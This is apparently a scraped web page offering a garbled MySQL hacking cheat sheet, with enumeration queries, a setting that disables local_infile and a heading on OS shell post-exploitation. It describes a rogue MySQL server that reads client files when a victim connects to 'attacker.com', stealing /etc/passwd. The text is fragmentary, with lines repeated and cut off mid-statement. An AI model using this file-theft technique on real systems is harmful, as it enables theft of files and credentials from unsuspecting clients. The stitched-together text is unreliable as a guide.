Mysql Hacktricks Direct

-- All databases SELECT schema_name FROM information_schema.schemata;

-- Disable local_infile SET GLOBAL local_infile = 0; mysql hacktricks

# Malicious server that reads client files python mysql_file_read_server.py Victim connects: mysql -h attacker.com -u root -p → You steal /etc/passwd Try: mysql --enable-local-infile -h target -u user -p 7. Post-Exploitation: OS Shell via MySQL If you can run OS commands (UDF or SQLi with file write): -- All databases SELECT schema_name FROM information_schema

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here